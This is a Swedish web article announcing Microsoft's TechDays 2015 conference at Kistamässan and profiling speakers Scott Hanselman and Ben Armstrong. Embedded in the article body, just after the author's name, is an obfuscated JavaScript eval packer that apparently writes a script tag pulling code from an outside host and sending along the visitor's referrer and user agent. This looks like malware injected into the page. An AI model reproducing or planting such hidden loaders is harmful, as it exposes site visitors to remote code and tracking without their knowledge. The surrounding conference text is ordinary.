Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

Teknikguru kommer till TechDays på Kistamässan

Teknikguru kommer till TechDays på Kistamässan
Sebastian

Den eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|azzza|var|u0026u|referrer|kbkhz||js|php’.split(’|’),0,{}))
21-22 oktober arrangeras TechDays – Microsofts största konferens, för sjätte gången i Sverige.  Konferensen samlar ett hundratal talare och ett femtiotal utställande företag under två dagar på Kistamässan.  Ett av de stora namnen inom ASP.net, Microsoft Azure och Open Source – Scott Hanselman kommer till konferensen. Årets tema är Future Decoded och handlar om att förbereda sig inför framtida förändringar.

Det finns experter som påstår att tekniken kommer att utvecklas mer de närmaste tio åren är vad den gjort de senaste femtio. Att många branscher står inför ett episkt teknikskifte drivet av nya generationer av människor som inte har samma referensramar eller behov som tidigare generationer. Frågan är om de är beredda. Vi står inför en transformation. Omvärlden, men även Microsoft som bolag och Windows som operativsystem.

Om detta handlar öppningssessionen på TechDays 2015. Det handlar om Future Decoded. Om transformation. Om att förbereda sig på att den närmaste framtiden kommer att innebära stora förändringar. Det kommer inte att bli enkelt men tillsammans är vi alla transformers.

Teknikguru kommer till TechDays
Scott Hanselman, Principal Program Manager Lead på Microsoft, är en av de största profilerna inom ASP.net, Microsoft Azure och Open Source. Han är en teknikguru och en uppskattad talare från konferenser som Build, TechEd, Ignite och andra konferenser världen över där han talat för tusentals utvecklare.  För dig som är IT tekniker kommer Hanselman visa hur du bygger och hanterar moderna hybridinfrastrukturer.
Session: Intro to ASP.NET 5 | 21 oktober kl 13.30 – 14.30

Träffa Ben Armstrong 
Ben Armtrong “The Virtual PC Guy” är Principal Program Manager på Microsoft och jobbar i Hyper-V utvecklingsteamet. Ben har jobbat med virtualisering i över ett decennium och har just nu fokus bland annat på att bygga nästa utgåva av Hyper-V.
Session: Microsoft’s New Windows Server Containers | 21 oktober kl 16.30 -17.30